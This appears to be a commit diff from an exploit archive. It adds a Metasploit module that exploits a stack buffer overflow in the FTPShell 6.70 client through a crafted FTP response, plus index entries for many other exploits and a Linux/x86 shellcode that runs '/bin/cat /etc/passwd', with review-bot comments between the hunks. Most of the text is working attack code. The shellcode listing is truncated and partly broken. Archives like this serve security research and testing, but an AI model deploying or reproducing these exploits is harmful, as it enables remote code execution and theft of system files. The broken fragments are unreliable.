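Review bot: The listings under "Exploit/POC" are not reproducible as shown: only `">`, `%all;`, `%dtd;]>` and `&send;` survive of `payload.dtd` and `config.xml`, the `<!ENTITY ...>` declarations and the `<!DOCTYPE` line are missing, so a reader cannot tell which local file is read or how the `send` entity is built. The request log suggests the exfiltrated file is a Windows `.ini` (the `[386Enh]`/`[drivers]` sections look like `system.ini`), but the advisory should name the file rather than leave it to be inferred. "Network Access: Remote" sits uneasily with the stated condition that a user must import a crafted file into the EMET interface (the index files it as a local exploit); "Remote" here describes the exfiltration destination, not the attack vector, and the advisory should say so. The vendor reply that the finding "does not meet our bar for servicing" suggests no fix is planned, which is the practical takeaway and deserves a line in the summary.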
@@ -0,0 +1,103 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = NormalRanking + + include Msf::Exploit::Remote::TcpServer + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'FTPShell client 6.70 (Enterprise edition) Stack Buffer Overflow', + 'Description' => %q{ + This module exploits a buffer overflow in the FTPShell client 6.70 (Enterprise + edition) allowing remote code execution. + }, + 'Author' => + [ + 'r4wd3r', # Original exploit author + 'Daniel Teixeira' # MSF module author + ], + 'License' => MSF_LICENSE, + 'References' => + [ + [ 'CVE', '2018-7573'], + [ 'EDB', '44596' ] + ], + 'Payload' => + { + 'Space' => 400, + 'BadChars' => "\x00\x22\x0d\x0a\x0b" + }, + 'Platform' => 'win', + 'Targets' => + [ + # CALL ESI in FTPShell.exe : 0x00452eed + [ 'Windows Universal', {'Ret' => "\xed\x2e\x45" } ] + ], + 'Privileged' => false, + 'DefaultOptions' => + { + 'SRVHOST' => '0.0.0.0', + 'EXITFUNC' => 'thread' + }, + 'DisclosureDate' => 'Mar 4 2017', + 'DefaultTarget' => 0)) + + register_options [ OptPort.new('SRVPORT', [ true, 'The FTP port to listen on', 21 ]) ] + end + + def exploit + srv_ip_for_client = datastore['SRVHOST'] + if srv_ip_for_client == '0.0.0.0' + if datastore['LHOST'] + srv_ip_for_client = datastore['LHOST'] + else + srv_ip_for_client = Rex::Socket.source_address('50.50.50.50') + end + end + + srv_port = datastore['SRVPORT'] + + print_status("Please ask your target(s) to connect to #{srv_ip_for_client}:#{srv_port}") + super + end + + def on_client_connect(client) + p = regenerate_payload(client) + return if p.nil? + print_status("#{client.peerhost} - connected.") + + res = client.get_once.to_s.strip + print_status("#{client.peerhost} - Request: #{res}") unless res.empty? 
+ print_status("#{client.peerhost} - Response: Sending 220 Welcome") + welcome = "220 Welcome.\r\n" + client.put(welcome) + + res = client.get_once.to_s.strip + print_status("#{client.peerhost} - Request: #{res}") + print_status("#{client.peerhost} - Response: sending 331 OK") + user = "331 OK.\r\n" + client.put(user) + + res = client.get_once.to_s.strip + print_status("#{client.peerhost} - Request: #{res}") + print_status("#{client.peerhost} - Response: Sending 230 OK") + pass = "230 OK.\r\n" + client.put(pass) + res = client.get_once.to_s.strip + print_status("#{client.peerhost} - Request: #{res}") + + sploit = '220 "' + sploit << payload.encoded + sploit << "\x20" * (payload_space - payload.encoded.length) + sploit << target.ret + sploit << "\" is current directory\r\n" + + print_status("#{client.peerhost} - Request: Sending the malicious response") + client.put(sploit) + + end +end \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 128c1dd1b..1cc0eca04 100644 --- a/files_exploits.csv +++ b/files_exploits.csv 
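Review bot: `'DisclosureDate' => 'Mar 4 2017'` does not agree with the references, `CVE-2018-7573` and EDB 44596, which are both 2018; this looks like a typo for `Mar 4 2018` and should be checked against the original advisory. The target's `Ret` is three bytes (`"\xed\x2e\x45"`) for an address documented as `0x00452eed`, and the byte that follows it in `sploit` is `"` (0x22), so the high `0x00` byte is presumably supplied by whatever terminates the copied string; if that is the mechanism, say so in the comment, e.g. `# 0x00452eed; only 3 bytes are sent because 0x00 is a bad char and the string terminator supplies it`, otherwise a reader will assume a truncated address. `on_client_connect` calls `client.get_once` four times with no timeout or nil check, so a client that sends fewer commands before its directory request may leave the handler waiting rather than failing, and the expected sequence (USER, PASS, SYST, PWD) should be stated in a comment.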
@@ -6008,6 +6008,9 @@ id,file,description,date,author,type,platform,port
 44925,exploits/linux/dos/44925.txt,"QEMU Guest Agent 2.12.50 - Denial of Service",2018-06-22,"Fakhri Zulkifli",dos,linux,
 44927,exploits/php/dos/44927.pl,"Opencart < 3.0.2.0 - Denial of Service",2018-06-22,"Todor Donev",dos,php,80
 44934,exploits/hardware/dos/44934.txt,"DIGISOL DG-BR4000NG - Buffer Overflow (PoC)",2018-06-25,"Adipta Basu",dos,hardware,
+44958,exploits/windows/dos/44958.py,"Core FTP LE 2.2 - Buffer Overflow (PoC)",2018-07-02,"Berk Cem Göksel",dos,windows,21
+44962,exploits/linux/dos/44962.txt,"SIPp 3.6 - Local Buffer Overflow (PoC)",2018-07-02,"Fakhri Zulkifli",dos,linux,
+44965,exploits/hardware/dos/44965.py,"Delta Industrial Automation COMMGR 1.08 - Stack Buffer Overflow (PoC)",2018-07-02,t4rkd3vilz,dos,hardware,80
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -9797,6 +9800,7 @@ id,file,description,date,author,type,platform,port
 44904,exploits/linux/local/44904.py,"Redis-cli < 5.0 - Buffer Overflow (PoC)",2018-06-18,"Fakhri Zulkifli",local,linux,
 44906,exploits/windows/local/44906.txt,"Microsoft COM for Windows - Privilege Escalation",2018-06-18,"Code White",local,windows,
 44920,exploits/linux/local/44920.txt,"Dell EMC RecoverPoint < 5.1.2 - Local Root Command Execution",2018-06-21,"Paul Taylor",local,linux,
+44961,exploits/windows/local/44961.txt,"Enhanced Mitigation Experience Toolkit (EMET) - XML External Entity Injection",2018-07-02,hyp3rlinx,local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -16588,6 +16592,8 @@ id,file,description,date,author,type,platform,port
 44890,exploits/linux/remote/44890.rb,"DHCP Client - Command Injection 'DynoRoot' (Metasploit)",2018-06-13,Metasploit,remote,linux,
 44921,exploits/linux/remote/44921.txt,"Dell EMC RecoverPoint < 5.1.2 - Remote Root Command Execution",2018-06-21,"Paul Taylor",remote,linux,22
 44941,exploits/windows/remote/44941.txt,"Foxit Reader 9.0.1.1049 - Remote Code Execution",2018-06-25,mr_me,remote,windows,
+44968,exploits/windows/remote/44968.rb,"FTPShell client 6.70 (Enterprise edition) - Stack Buffer Overflow (Metasploit)",2018-07-02,Metasploit,remote,windows,
+44969,exploits/linux/remote/44969.rb,"Nagios XI 5.2.6-5.4.12 - Chained Remote Code Execution (Metasploit)",2018-07-02,Metasploit,remote,linux,80
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -38100,7 +38106,7 @@ id,file,description,date,author,type,platform,port
 41346,exploits/php/webapps/41346.txt,"Joomla! Component JE Ticket System 1.2 - SQL Injection",2017-02-13,"Ihsan Sencan",webapps,php,
 41347,exploits/php/webapps/41347.txt,"Joomla! Component JE Messanger - SQL Injection",2017-02-13,"Ihsan Sencan",webapps,php,
 41359,exploits/php/webapps/41359.txt,"Itech B2B Script 4.29 - Multiple Vulnerabilities",2017-02-12,"Marc Castejon",webapps,php,
-41360,exploits/hardware/webapps/41360.rb,"Geutebruck 5.02024 G-Cam/EFD-2250 - Remote Command Execution (Metasploit)",2017-02-15,RandoriSec,webapps,hardware,
+41360,exploits/hardware/webapps/41360.rb,"Geutebruck 5.02024 G-Cam/EFD-2250 - 'testaction.cgi' Remote Command Execution (Metasploit)",2017-02-15,RandoriSec,webapps,hardware,
 41361,exploits/hardware/webapps/41361.txt,"Trend Micro InterScan Web Security Virtual Appliance (IWSVA) 6.5 - Multiple Vulnerabilities",2016-11-28,SlidingWindow,webapps,hardware,
 41362,exploits/php/webapps/41362.txt,"Joomla! Component JoomBlog 1.3.1 - SQL Injection",2017-02-15,"Ihsan Sencan",webapps,php,
 41368,exploits/php/webapps/41368.txt,"Joomla! Component JSP Store Locator 2.2 - 'id' SQL Injection",2017-02-15,"Ihsan Sencan",webapps,php,
@@ -39605,3 +39611,7 @@ id,file,description,date,author,type,platform,port
 44954,exploits/php/webapps/44954.txt,"hycus CMS 1.0.4 - Authentication Bypass",2018-06-28,"Berk Dusunur",webapps,php,
 44955,exploits/hardware/webapps/44955.txt,"DIGISOL DG-HR3400 Wireless Router - Cross-Site Scripting",2018-06-28,"Adipta Basu",webapps,hardware,80
 44956,exploits/hardware/webapps/44956.py,"Cisco Adaptive Security Appliance - Path Traversal",2018-06-28,"Yassine Aboukir",webapps,hardware,
+44957,exploits/hardware/webapps/44957.rb,"Geutebruck 5.02024 G-Cam/EFD-2250 - 'simple_loglistjs.cgi' Remote Command Execution (Metasploit)",2018-07-02,RandoriSec,webapps,hardware,80
+44959,exploits/hardware/webapps/44959.py,"VMware NSX SD-WAN Edge < 3.1.2 - Command Injection",2018-07-02,ParagonSec,webapps,hardware,
+44960,exploits/php/webapps/44960.html,"DAMICMS 6.0.0 - Cross-Site Request Forgery (Add Admin)",2018-07-02,bay0net,webapps,php,80
+44964,exploits/php/webapps/44964.txt,"Dolibarr ERP CRM < 7.0.3 - PHP Code Injection",2018-07-02,om3rcitak,webapps,php,80
diff --git a/files_shellcodes.csv b/files_shellcodes.csv
index e20c0b60d..fcc18ea0f 100644
--- a/files_shellcodes.csv
+++ b/files_shellcodes.csv
@@ -892,3 +892,4 @@ id,file,description,date,author,type,platform
 44808,shellcodes/linux_x86/44808.c,"Linux/x86 - Bind (4444/TCP) Shell (/bin/sh) Shellcode (105 bytes)",2018-05-31,"Paolo Perego",shellcode,linux_x86
 44811,shellcodes/arm/44811.c,"Linux/ARM - Egghunter (0x50905090) + execve('/bin/sh') Shellcode (32 bytes)",2018-05-31,"Ken Kitahara",shellcode,arm
 44856,shellcodes/arm/44856.c,"Linux/ARM - Egghunter (0x50905090) + execve('/bin/sh') Shellcode (60 bytes)",2018-06-08,rtmcx,shellcode,arm
+44963,shellcodes/linux_x86/44963.c,"Linux/x86 - Execve /bin/cat /etc/passwd Shellcode (37 bytes)",2018-07-02,"Anurag Srivastava",shellcode,linux_x86
diff --git a/shellcodes/linux_x86/44963.c b/shellcodes/linux_x86/44963.c
new file mode 100644
index 000000000..49280cf13
--- /dev/null
+++ b/shellcodes/linux_x86/44963.c
@@ -0,0 +1,41 @@
+/*
+# Linux/x86 - execve /bin/cat /etc//passwd shellcode (37 bytes)
+# Author: Anurag Srivastava
+# Tested on: i686 GNU/Linux
+# Shellcode Length: 37
+#Greetz - Manish Kishan Tanwar,Kishan Sharma,Vardan,Himanshu,Ravi and Spirited w0lf
+
+Disassembly of section .text:
+
+08048060 <_start>:
+ 8048060: 29 c9 sub ecx,ecx
+ 8048062: 51 push ecx
+ 8048063: 68 2f 63 61 74 push 0x7461632f
+ 8048068: 68 2f 62 69 6e push 0x6e69622f
+ 804806d: 89 e3 mov ebx,esp
+ 804806f: 51 push ecx
+ 8048070: 68 73 73 77 64 push 0x64777373
+ 8048075: 68 2f 2f 70 61 push 0x61702f2f
+ 804807a: 68 2f 65 74 63 push 0x6374652f
+ 804807f: 89 e1 mov ecx,esp
+ 8048081: 6a 0b push 0xb
+ 8048083: 58 pop eax
+ 8048084: 6a 00 push 0x0
+ 8048086: 51 push ecx
+ 8048087: 53 push ebx
+ 8048088: 89 e1 mov ecx,esp
+ 804808a: cd 80 int 0x80
+
+===============POC by Anurag Srivastava=========================
+*/
+
+#include
+#include
+unsigned char code[] = \
+"\x29\xc9\x51\x68\x2f\x63\x61\x74\x68\x2f\x62\x69\x6e\x89\xe3\x51\x68\x73\x73\x77\x64\x68\x$
+main()
+{
+printf("Shellcode Length: %d\n", strlen(code));
+ int (*ret)() = (int(*)())code;
+ ret();
+}
\ No newline at end of file
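Review bot: The length printed by the `printf` near the end of the hunk comes from `strlen(code)`, which stops at the first NUL, yet the disassembly header above lists `6a 00 push 0x0` at 8048084, so if the byte string mirrors that listing the printed count will be short of the real size; `sizeof(code) - 1` reports the array length regardless of embedded zero bytes. The listed bytes also add up to 44, while the header comment and the CSV entry both say 37, so one of the two figures is stale and should be reconciled before publication. `main()` has no return type (implicit int, invalid since C99 and an error by default in current compilers) and the two `#include` lines carry no header name as rendered here — if that is not a page artifact the file does not compile; `int main(void)` with `<stdio.h>` and `<string.h>` named explicitly would address both. The string literal appears cut off at `\x$`, which looks like a rendering truncation rather than file content, but is worth confirming against the committed file.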